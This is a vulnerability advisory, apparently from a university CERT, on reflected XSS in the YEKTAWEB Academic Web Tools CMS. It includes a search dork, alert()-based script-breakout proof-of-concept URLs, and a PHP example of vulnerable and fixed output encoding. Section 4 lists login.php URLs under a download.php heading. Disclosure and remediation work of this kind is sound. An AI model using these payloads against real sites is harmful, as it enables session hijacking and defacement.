============================================
IUT-CERT
============================================
Title: Academic Web Tools CMS Multiple XSS
Vendor: www.yektaweb.com
Vulnerable Version: 1.5.7 and prior
Type: XSS
Fix: N/A
Dork: AWT YEKTA
============================================
nsec.ir
============================================

Description:
------------------
YEKTAWEB Academic Web Tools is a Persian Content Management System (CMS) for managing university affairs such as conferences and journals. The built-in filter of this package cannot prevent XSS attacks on some parameters.

Vulnerabilities:
------------------
1- Cross Site Scripting (XSS) in "/page.php" in the "sid", "logincase" and "redirect" parameters.
http://yoursite/page.php?sid=[XSS]
http://yoursite/page.php?logincase=[XSS]
http://yoursite/page.php?redirect=[XSS]

2- Cross Site Scripting (XSS) in "/page_arch.php" in the "sid", "logincase" and "redirect" parameters.
http://yoursite/page_arch.php?sid=[XSS]
http://yoursite/page_arch.php?logincase=[XSS]
http://yoursite/page_arch.php?redirect=[XSS]

3- Cross Site Scripting (XSS) in "/login.php" in the "sid", "logincase" and "redirect" parameters.
http://yoursite/login.php?sid=[XSS]
http://yoursite/login.php?logincase=[XSS]
http://yoursite/login.php?redirect=[XSS]

4- Cross Site Scripting (XSS) in "/download.php" in the "sid", "logincase" and "redirect" parameters.
http://yoursite/login.php?sid=[XSS]
http://yoursite/login.php?logincase=[XSS]
http://yoursite/login.php?redirect=[XSS]

Exploit/PoC:
------------------
Example:
http://yoursite/login.php?slct_pg_id=53&sid=1*/--></script><script>alert(188017)</script>&slc_lang=fa
http://yoursite/page_arch.php?slc_lang=fa&sid=1&logincase=*/--></script><script>alert(188017)</script>
http://yoursite/page.php?sid=1&slc_lang=en&redirect=*/--></script><script>alert(188017)</script>

Solution:
------------------
The input validation filter should be patched: validate parameters with a known format (such as a numeric "sid") and encode every reflected value for the exact context it is written into (HTML text, attribute, or JavaScript literal) rather than relying on a blacklist filter.
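As an added illustration of the solution (this is not YEKTAWEB code; the CMS templates are not on the page), the PHP below shows the reflect-into-script pattern that the PoC payload's "*/-->" prefix targets beside a context-aware fix. It assumes the parameters are echoed into an inline <script> block and into page markup; function names and the sample request are hypothetical.

```php
<?php
// Added example, not YEKTAWEB code. Assumes "sid" and "logincase" are reflected
// into an inline <script> block (what the PoC payload's "*/-->" prefix implies).

// Vulnerable pattern: the raw parameter lands inside a JS comment and a JS
// string, so a value like  */--></script><script>...</script>  closes the
// comment, closes the script element and starts a new one.
function render_vulnerable(array $get): string
{
    $logincase = $get['logincase'] ?? '';
    return "<script>/* case: {$logincase} */ var logincase = '{$logincase}';</script>";
}

// Encode a value for use as a JavaScript literal inside an inline <script>.
// JSON_HEX_* turns < > & ' " into \uXXXX escapes and "/" is escaped by
// default, so the sequence "</script>" can never appear in the output.
function js_literal(string $value): string
{
    return json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
            | JSON_INVALID_UTF8_SUBSTITUTE
    );
}

// Encode a value for use as HTML text or attribute content.
function html_text(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Hardened pattern: validate fields with a known shape (reject, do not "clean"),
// and encode every reflected value for the context it is written into.
function render_fixed(array $get): string
{
    $sid = filter_var($get['sid'] ?? '', FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]);
    if ($sid === false) {
        http_response_code(400);
        return 'invalid sid';
    }
    $logincase = (string) ($get['logincase'] ?? '');
    return '<script>var sid = ' . js_literal((string) $sid)
        . '; var logincase = ' . js_literal($logincase) . ';</script>'
        . '<p>' . html_text($logincase) . '</p>';
}

// Constructed request with the same shape as the advisory's PoC.
$poc = ['sid' => '1', 'logincase' => '*/--></script><script>alert(1)</script>'];
echo render_vulnerable($poc), PHP_EOL; // script block is broken out of
echo render_fixed($poc), PHP_EOL;      // payload stays an inert string literal
```

In the fixed output the payload is emitted as `"*\/--\u003E\u003C\/script\u003E..."` in the script and as `&lt;/script&gt;...` in the paragraph, so the browser never sees a closing script tag.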
Credit:
------------------
Isfahan University of Technology - Computer Emergency Response Team
Thanks to: M. R. Faghani, N. Fathi, E. Aerabi, E. Jafari